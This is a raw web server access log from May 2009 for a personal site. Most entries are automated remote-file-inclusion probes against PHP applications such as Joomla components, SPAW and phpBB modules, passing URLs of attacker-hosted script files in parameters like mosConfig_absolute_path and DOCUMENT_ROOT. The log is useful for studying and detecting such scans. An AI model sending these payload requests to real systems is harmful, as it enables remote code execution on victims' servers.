204.14.106.24 - - [05/May/2009:09:00:07 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musil.cz/a.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:09:00:08 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:09:00:08 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:09:00:08 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [05/May/2009:09:00:11 -0700] "GET /logs/access_090102.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musil.cz/a.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [05/May/2009:09:00:11 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musil.cz/a.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [05/May/2009:09:00:11 -0700] "GET /logs/access_080809.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musil.cz/a.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:09:00:12 -0700] "GET /logs/access_081126.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:00:14 -0700] "GET /logs/access_080925.log%20%20/demo1/auction_confirmation.inc.php/header.php?prefix=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:00:14 -0700] "GET /logs/access_080820.log%20%20/demo1/auction_confirmation.inc.php/header.php?prefix=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.158.124.146 - - [05/May/2009:09:00:19 -0700] "GET /logs/access_081010.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.237.76.50 - - [05/May/2009:09:00:30 -0700] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:09:00:40 -0700] "GET /logs/access_081021.log///vwar/backup/errors.php?error=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:09:00:40 -0700] "GET /logs/access_081021.log///vwar/backup/errors.php?error=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:00:55 -0700] "GET /logs/access_080820.log/demo1/auction_confirmation.inc.php/header.php?prefix=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:09:01:12 -0700] "GET /logs/access_090220.log//index.php?DOCUMENT_ROOT=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:09:01:12 -0700] "GET /logs/access_080402.log//index.php?DOCUMENT_ROOT=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:09:01:12 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:09:01:20 -0700] "GET /logs/access_090106.log/index.php?pg=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:09:01:21 -0700] "GET /logs/access_080402.log%20%20//index.php?DOCUMENT_ROOT=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:09:01:22 -0700] "GET /logs/access_081210.log/index.php?pg=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:09:01:22 -0700] "GET /logs/access_081210.log/index.php?pg=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:09:01:26 -0700] "GET /logs/index.php?pg=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.109.22.107 - - [05/May/2009:09:01:28 -0700] "GET /logs/access_081230.log//language.inc.php?langs_dir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
194.109.22.107 - - [05/May/2009:09:01:28 -0700] "GET /language.inc.php?langs_dir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
194.109.22.107 - - [05/May/2009:09:01:29 -0700] "GET /logs//language.inc.php?langs_dir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:01:29 -0700] "GET /logs/access_090224.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:01:29 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:01:32 -0700] "GET /logs/access_081127.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:01:36 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:09:01:45 -0700] "GET /logs/access_080416.log%20%20//index.php?DOCUMENT_ROOT=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:01:50 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:09:01:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:01:57 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:02:05 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:09:02:05 -0700] "GET /logs/access_080506.log//language.inc.php?langs_dir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:09:02:06 -0700] "GET /language.inc.php?langs_dir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:09:02:06 -0700] "GET /logs//language.inc.php?langs_dir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:09:02:08 -0700] "GET /logs/access_081230.log//language.inc.php?langs_dir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:09:02:12 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
194.109.22.107 - - [05/May/2009:09:02:18 -0700] "GET /logs/access_080506.log//language.inc.php?langs_dir=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:09:02:21 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:09:02:21 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:09:02:21 -0700] "GET /logs/access_080611.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:09:02:21 -0700] "GET /logs/access_080419.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:09:02:23 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 42930 "-" "Mozilla/5.0" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:09:02:30 -0700] "GET /index.php?pg=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 200 42977 "-" "libwww-perl/5.79" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:02:33 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:02:33 -0700] "GET /logs/access_081020.log%20%20/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:02:39 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 200 43071 "-" "libwww-perl/5.805" "www.dmulk.com"
194.109.22.107 - - [05/May/2009:09:02:44 -0700] "GET /logs/access_090213.log//admin/index.php?_shop_path=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:09:02:53 -0700] "GET /logs/access_071220.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:09:02:53 -0700] "GET /logs/access_081126.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:02 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:02 -0700] "GET /logs/access_090321.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:02 -0700] "GET /logs/access_090304.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:02 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:03 -0700] "GET /logs/access_090321.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:03 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:03 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:03 -0700] "GET /logs/access_090304.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:06 -0700] "GET /logs/access_090304.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:06 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:07 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:08 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:08 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:08 -0700] "GET /logs/access_090304.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [05/May/2009:09:03:09 -0700] "GET /logs/access_090102.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musil.cz/a.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [05/May/2009:09:03:10 -0700] "GET /logs/access_080809.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musil.cz/a.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:03:10 -0700] "GET /logs/access_081020.log/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:03:10 -0700] "GET /logs/access_081230.log/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:11 -0700] "GET /logs/access_080928.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:13 -0700] "GET /logs/access_080928.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:03:25 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:03:25 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [05/May/2009:09:03:25 -0700] "GET /logs/access_080320.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musil.cz/a.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:09:03:35 -0700] "GET /logs/access_090403.log/home.php?index=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:09:03:35 -0700] "GET /home.php?index=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:09:03:36 -0700] "GET /logs/home.php?index=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:09:03:36 -0700] "GET /logs/access_080611.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:09:03:36 -0700] "GET /logs/access_080419.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sumsel.polri.go.id/intel/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:40 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:40 -0700] "GET /logs/access_090321.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:40 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:40 -0700] "GET /logs/access_090304.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:49 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:49 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:50 -0700] "GET /logs/access_090304.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:03:50 -0700] "GET /logs/access_090321.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:03:50 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:04:06 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:04:31 -0700] "GET /logs/access_080623.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:04:31 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:04:32 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 200 42921 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:04:43 -0700] "GET /logs/access_080227.log//poll/png.php?include_path=http://rgruppe.com.au/media/index.log?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:04:46 -0700] "GET /logs//poll/png.php?include_path=http://rgruppe.com.au/media/index.log?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:04:48 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:04:51 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:05:02 -0700] "GET /logs/access_081008.log%20%20//index.php?DOCUMENT_ROOT=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:05:11 -0700] "GET /logs/access_080820.log/demo1/auction_confirmation.inc.php/header.php?prefix=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:05:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
91.149.157.130 - - [05/May/2009:09:05:28 -0700] "GET /logs/access_080304.log/?path%5Bdocroot%5D=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:05:31 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
91.149.157.130 - - [05/May/2009:09:05:35 -0700] "GET /logs/?path%5Bdocroot%5D=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 200 98189 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:09:05:47 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
198.22.131.50 - - [05/May/2009:09:05:51 -0700] "GET /bikes/dteel/Temp/IMG_3454s.JPG HTTP/1.1" 200 277018 "http://www.st-owners.com/forums/newreply.php?do=postreply&t=63518" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
91.149.157.130 - - [05/May/2009:09:05:52 -0700] "GET /logs/access_080430.log/?path%5Bdocroot%5D=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:05:55 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 200 42921 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:09:06:01 -0700] "GET /logs/access_090403.log/home.php?index=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:09:06:01 -0700] "GET /home.php?index=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:09:06:02 -0700] "GET /logs/home.php?index=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:09:06:18 -0700] "GET /home.php?index=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
222.236.44.45 - - [05/May/2009:09:06:20 -0700] "GET /logs/access_080118.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.44.45 - - [05/May/2009:09:06:20 -0700] "GET /logs/access_080124.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.44.45 - - [05/May/2009:09:06:21 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 98195 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:09:06:27 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
209.51.131.210 - - [05/May/2009:09:06:27 -0700] "GET /logs/access_081010.log/errors.php?error=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.51.131.210 - - [05/May/2009:09:06:27 -0700] "GET /logs/access_081010.log/errors.php?error=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.51.131.210 - - [05/May/2009:09:06:27 -0700] "GET /errors.php?error=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.51.131.210 - - [05/May/2009:09:06:27 -0700] "GET /errors.php?error=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
